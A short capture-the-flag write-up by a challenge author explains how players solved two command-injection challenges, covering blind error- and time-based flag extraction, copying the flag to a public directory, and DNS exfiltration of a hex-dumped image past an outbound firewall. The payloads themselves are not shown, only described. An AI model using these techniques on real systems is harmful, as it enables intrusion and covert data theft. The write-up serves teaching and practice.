This one will be a quick one! I am really tight on time but wanted to get this writeup out. Made the chal with my friend Korea

Download the source code from here. Note: the source code is the same in both chals, just the flag file is different.

There was a challenge called "cat flag.txt" first

It is a simple terminal that lets you know if your command was executed successfully or not. In short Error based.

You know the flag at flag.txt so you can do blind comparison to get the flag. For example one of the payloads used was:

If the flag has "CON" in it, it will return success else error, and like that you brute force each character of the flag.

Another time-based payload used was:

This will check if the first character of the flag is "C" and if it is, it will sleep for 4 seconds. If it is not, it will return immediately. He used time based blind injection to get the flag.

A third creative apporch was:

He moved it to the public directory and accessed it directly. 🙃 (We closed that in the revenge one: flag.png)

Now.. Here you can't just brute force characters, it is an image file. you can hex it but still it will be thousands of characters to brute force.

So.. any easier ideas?

Players noticed that there is a firewall that blocks normal outgoing tools like wget and ping, but DNS queries still work. That means you can’t use HTTP to get the flag, but you can leak small bits of data by encoding them into DNS requests (DNS exfiltration).

This technique is used against large companies because DNS traffic often bypasses firewalls. Attackers hide stolen data inside DNS queries sent to domains they control, quietly exfiltrating information.

You can use burp collab for this, or your own DNS server. But a free way is using any online free DNS service like dig.pm or webhook.site

A payload like this can be used:

You will get DNS requests like this:

What the payload does is, it hex dumps the flag.png file and for each line it makes a DNS request to your domain. You can then collect all the requests and convert them back to binary to get the flag.png file.

You can use other tools like dig, nslookup ... etc. All lead to the same result.

That's it for this challenge. Hope you enjoyed the writeup and learned something new. Till the next one!